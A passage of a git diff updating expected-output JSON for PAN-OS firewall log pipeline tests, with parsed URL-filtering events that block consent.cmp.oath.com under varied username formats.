16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,.\\src_username,.\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,.\\src_username,.\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" 
+ } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": ".", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": ".", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst-domainname", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\\\src_username,dst-domainname\\\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\\\src_username,dst-domainname\\\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": 
"0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + 
"domain": "dst-domainname", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username@src-domainname,dst_username@dst-domainname,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username@src-domainname,dst_username@dst-domainname,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": 
"ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": 
"Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username,dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username,dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + 
"direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "name": "src_username" + } 
+ }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,x-fwd-for: 10.10.10.50,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,x-fwd-for: 10.10.10.50,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + 
"application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "x-fwd-for: 10.10.10.50" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "name": "x-fwd-for: 10.10.10.50" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": 
"consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "name": "x-fwd-for: 10.10.10.50" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst_domainname", + "name": "dst-user#name" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domainname\\\\src-user#name,dst_domainname\\\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domainname\\\\src-user#name,dst_domainname\\\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src-user#name", + "dst-user#name" + ] + }, + "rule": { + 
"name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src_domainname", + "name": "src-user#name" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src_domainname", + "name": "src-user#name" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst_domain..name", + "name": "dst-user#name" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domain..name\\\\src-user#name,dst_domain..name\\\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + 
}, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domain..name\\\\src-user#name,dst_domain..name\\\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + 
"type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src-user#name", + "dst-user#name" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src_domain..name", + "name": "src-user#name" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src_domain..name", + "name": "src-user#name" + } } ] -} \ No newline at end of file +} diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json index 296d626837e..de50a67d466 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json +++ 